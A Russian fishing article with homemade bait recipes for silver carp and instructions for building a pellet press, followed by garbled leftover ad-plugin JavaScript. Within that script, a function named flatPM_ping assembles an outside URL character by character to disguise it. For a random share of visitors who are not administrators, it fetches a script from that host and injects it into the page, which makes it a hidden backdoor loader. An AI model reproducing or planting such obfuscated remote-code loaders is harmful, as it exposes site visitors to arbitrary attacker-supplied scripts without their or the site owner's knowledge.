Многие рыбаки уже привыкли не покупать прикорм или насадку, изготовленные в промышленных условиях. Такие приманки весьма дорогостоящи и обладают способностью быстро расходоваться вне зависимости от того, будет клевать рыба или не будет. Хорошее изготовление технопланктона своими руками мало чем будет отличаться от заводского, возможно, только формованием. Для того чтоб изготовить его в домашних условиях, есть много рецептов. Готовят данную приманку и в прессованном, и в непрессованном виде. Второй вид используют в кормушках из сетки, оснащённых устройствами для крючков.

Технология изготовления

Как смастерить технопланктон на толстолобика своими руками самостоятельно? При его изготовлении должны соблюдаться два главных условия. Первое: приманка должна давать муть (частички отделяются в воде от таблеток, создавая облачко, напоминая фитопланктон). Второе: технопланктон на толстолобика своими руками должен, так сказать, «пылить» (частички отделяются от «бочонка», опускаясь на дно, и потом при всплытии вверх тянут муть за собой). При этом не следует слишком уж увлекаться многообразием компонентов – помним: лучшее – враг хорошего! Довольно будет трех-четырех составляющих.

Основной ингредиент

Главные компоненты, входящие в составы технопланктона – наполнители. В их качестве можно использовать муку из кукурузы или гречки, пшена или гороха, а также измельченные сухарики, печенье, прочие ингредиенты, какие можно перемалывать до состояния муки. Пропорции не так важны, можно взять всего в равных количествах. Сухари с печеньем в целях усиления вкуса технопланктона, своими руками изготовленного, рекомендуется подвергать температурной обработке. Весьма хорошо будет взять муку из овса, она придает приманке способности равномерно растворяться.

Клеевая составляющая

Это отлично спрессованные компоненты, которые медленно подлежат растворению. К примеру, в состав технопланктона своими руками может входить декстрин или мальтодекстрин (12 процентов от общего объема). Или сухое молоко, или сахарная пудра (10 процентов от общего состава).

Ароматы

Как правило, применимы в сухом виде, а также в форме жидкости. Введенное количество ароматизаторов должно дать устойчивый запах. Толстолобики, как известно, предпочитают подслащенные ароматы: мед с клубникой, малину, карамель, ваниль.

Крахмал с рисовой мукой

Они могут быть введены в донный технопланктон своими руками в случае, когда прикорм слишком уж быстро растворяется в водной среде. Эти компоненты способствуют прессованию. Но если применить слишком много таких составляющих, произойдет обратный эффект — «бочонок» будет быстрее растворяться в воде.

Советы

  • Если таблетки плохо прессуются, можно добавить каплю воды на единицу. В итоге по высыхании получается сухая, твердая приманка, и ее невозможно разламывать при помощи пальцев.
  • Толстолобикам очень нравится, если технопланктон, своими руками изготовленный, пахнет свежим медком летом, а весной и в осеннее время им весьма по душе различные травяные ароматы. С такими добавками и рыбалка будет результативнее.
  • Вне зависимости от состава продукта, обязательно вводите сухое молоко (как вариант – заменитель), чтоб получалась мутная дорожка. И крахмал (как вариант – овсяные отруби), чтоб при всплывании он тянул за собой муть, привлекая рыб.
  • Заводские таблетки обладают эффектами «гейзера» — шипят и пузырятся, попадая в жидкую среду. Это – элемент приманки на толстолобика. В условиях кухни для данного эффекта можно прибавить в состав аптечный «Алкозельцер» (как вариант – сухую смесь соды пищевой с кислотой лимона).
  • «Правильный» технопланктон медленно тает, начиная где-то с 5 минут нахождения в жидкости. Эффект должен продлиться примерно с полчаса. В том случае, когда приманка неизменно стоит на снасти, а затем моментально распадается, результат не будет достигнутым.
  • Для прессовки таблеток можно использовать приспособление для технопланктона своими руками на дому. Оно представляет собой небольшой ручной пресс, который также можно соорудить самостоятельно (чертежи есть в соответствующей литературе, да и в Сети).

Как сделать технопланктон своими руками: рецепты на основе муки

  1. Нужно взять муки гречневой 200 граммов, овсяной — 200 г, кукурузной — 400 г. Сухарей панировочных 200 граммов. Затем готовим сахарный сироп (100 граммов сахара на 100 воды). Смешиваем сухие компоненты и увлажняем сиропом, придавая массе однородности при помощи блендера.
  2. Арахиса жареного молотого – полкило. Столько же по весу муки кукурузной и крупы манной. Добавим муку рыбную – килограмм. Готовим сахарный сироп (100 на 100). Смешиваем сухие компоненты, увлажняем сахарным сиропом, перемешиваем массу в блендере.
  3. Берем в равных частях: муку кукурузную (250 г), муку гороховую, семена подсолнечника (измельчить!). Добавляем панировочных сухарей – граммов сто, молока сухого такое же количество, киселя сухого – граммов пятьдесят и столько же меда цветочного. Кисель разводим отдельно в небольшом количестве воды, а после готовим его в микроволновке. Затем перемешиваем сухие ингредиенты, понемногу вводим кисель в общую массу, перемешивая при помощи блендера.
  4. Крупа манки — 500 г, мука из кукурузы — 500 г, сухари для панировки — 300 г, мамалыга — 300 г, сахар — 300 г. Все ингредиенты перемешиваем, после добавляем медовый сироп (вводим маленькими порциями, чтобы не переувлажнять прикорм).
  5. Часть первая: корм для собак сухой разновидности — 500 г, арахиса жареного молотого — 100 г, паприка в порошке — 50 г, пудры сахарной — 200 граммов. Часть вторая прикормки: картофель вареный 500 г, бананы — 1000 г, желток яйца — 1 шт., молока сгущенного — 50 граммов. В одной емкости перемешиваем ингредиенты из 1-й части рецептуры, а в другой – из 2-й. После соединяем эти части и замешиваем тесто для применения в донных кормушках. Для того чтобы получить смесь для изготовления таблеток, необходимо будет добавить побольше сухой (1-й) части смеси, чтоб консистенция уже была сходна с рассыпчатой кашкой.

Надо также отметить, что хотя изначально данный вид приманки предназначен для «охоты» на толстолоба, на нее можно половить и другие разновидности рыб. Основное правило для уловистой ловли – примерно на полчасика оставить в покое оснастку. При попадании таблетки в водную среду формируется облачко, оно имитирует планктон, приманивая рыбу. После сам процесс ужения становится увлекательным. И немаловажным фактором будет качественная приманка, которую вы изготовили своими руками! Удачи!

Изготовление технопланктона своими руками

Технопланктон своими руками. Технопланктон – это специальная смесь из разного вида кормов, которую предварительно измельчили и перемешали в нужных пропорциях. Большинство рыбаков не хотят тратиться на такую дорогую приманку, поэтому пытаются сделать ее своими руками. Приманка, сделанная своими руками, отличается от покупной, лишь формой.

Технопланктон бывает не только прессованным, еще его можно переместить в кормушку, сделанную из сетки. Технопланктон бывает естественным и похож на обычный планктон. Основные условия для создания приманки:

  • В состав технопланктона лучше включить компоненты, которые будут давать реакцию в виде мути, части должны легко отделяться от таблетки и быстро всплывать на поверхность, тем самым создавая облако.
  • Приманка должна вызывать пыль.
  • При создании приманки, не стоит использовать слишком много разных компонентов, максимальное число, это четыре.

Наполнители

Самыми распространенным наполнителем для технопланктона считается мука, сделанная из гороха, гречки, пшена, овса или кукурузы. Иногда в состав включают сухарики и все остальное, что можно превратить в муку. При создании такой приманки, пропорции не играют большой роли, самое важное это правильно обрабатывать продукты.

Если не учесть это, вы можете столкнуться с тем, что рыба не клюнет на такую приманку из-за отсутствия аромата. Печенье и сухарики рекомендуется подвергать термической обработке, ведь это улучшает вкус. Помимо этого, советуют использовать муку из овса, она помогает быстрому растворению.

Клеевая основа и ароматизаторы. В состав такой основы должны входить вещества, которые легко растворяются в воде и просто прессуются. Чтобы сделать приманку своими руками, можно использовать:

  • Мальтодекстрин и декстрин. Масса этого вещества, должна быть 12% от общего веса технопланктона.
  • Сахарная пудра, сухое молоко и сливки. Масса от общего веса должна быть 10%.

Кроме всего этого, можно добавить ароматизаторы в состав приманки. Ароматизаторы применяют в жидкой и сухой форме. Чтобы ваш ароматизатор был устойчивее, стоит добавлять сладкие ароматы, такие как: ваниль, клубника, мед, карамель.

Если прикорм слишком быстро растворяется, в состав необходимо добавить риса или крахмал. Такие компоненты улучшают прессование. Слишком много их добавлять не надо или вы получите обратный эффект. При плохом прессе, можно добавить немного воды.

Как создать приманку?

Если вы хотите сделать пресс для технопланктона, стоит ознакомиться с чертежами других или сделать чертежи самостоятельно. Создание чертежа, поможет вам ускорить процесс и сделать работу качественно. Главные правила для создания приманки:

  • В содержании таблетки должны присутствовать, такие компоненты, как сухое молоко или его заменители, ведь оно вызывает муть и привлекает толстолобиков.
  • Если вы хотите добиться эффекта гейзера в домашних условиях, то нужно добавить лимонную кислоту, соду или алькозельцер.
  • Техноплонктон должен таять постепенно, если приманка распадется за несколько минут, то прикорм не сработает.

Рецепты технопланктона и их изготовление

Домашний рецепт.

Для создания искусственного технопланктона, вам будет необходимо взять 200 грамм гречневой и овсяной муки, 400 грамм кукурузной муки, а также 200 грамм сухариков, 100 грамм сахара и пару стаканов воды. Вначале сделайте сироп из воды и сахара, после этого смешайте все сухие компоненты. Сделанную смесь увлажните сахарным сиропом и перемешайте с помощью блендера. Вот и весь рецепт технопланктона, получается, как настоящий планктон. Еще существует много способов и рецептов, но помните, рыбная ловля, это такое занятие, где все строго индивидуально. Как сделать пресс для технопланктона? Материалы, которые понадобятся:

  • Небольшой кусок трубы.
  • Вставка переднего ароматизатора.
  • Шарик с подшипника.
  • Блюдце с отверстием в центре.
  • Спица.
  • Еще два выточенных блюдца.
  • Болты с большой толщиной.
  • Гайки под болты.
  • Пластинка с дырочками.
  • Самодельный болт с резьбой.
  • Граверы.

Как происходит процесс создания?

  • На краю трубы создают три отверстия на равном расстоянии друг от друга, болты будут держать блюдце и вставку от амортизатора.
  • В отверстия помещаются болты и с граверами закручиваются гайками.
  • Опускают в трубу блюдце, диаметр которого совпадает с диаметром трубы.
  • Опускают вставку от амортизатора.
  • Блюдце вставляют в амортизаторную вставку.
  • Засыпается смесь технопланктона в ставку амортизатора и все утрамбовывается.
  • Сверху ставят второе блюдце с приваренной спицей, необходимо следить за тем, чтобы спица прошла через все отверстия.
  • Кладут шарик в углубление.
  • Закручиваем пластинку.
  • Греем на огне со всех сторон.
  • Приступаем к ввинчиванию самодельного болта.
  • Ждем, пока пресс форма для технопланктона остынет.
  • Снимаем пластинку, вытаскиваем полученный техноплонктон и возвращаем все детали пресса обратно.

Заключение

Даже самые опытные рыбаки отмечают, что технопланктон, довольно полезен при рыбной ловле. Благодаря такой наживке можно выловить самых крупных и привередливых рыбок. Если вы новичок в рыбной ловле, то вначале стоит купить наживку, а потом уже пытаться изготовить ее своими руками, ведь это довольно сложный процесс. Тем, кто хочет поймать рыбу под названием толстолобик, стоит использовать наживку с запахом меда, чеснока или трав.

Еще толстолобики ведутся на эффект гейзера, ведь благодаря ему, наживка начинает пылить. Ну и последнее, если вы решились сделать приманку своими руками, ищите хорошие рецепты, и тогда все получится! Надеюсь, вас ждет удачная рыбная ловля.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Яндекс.Метрика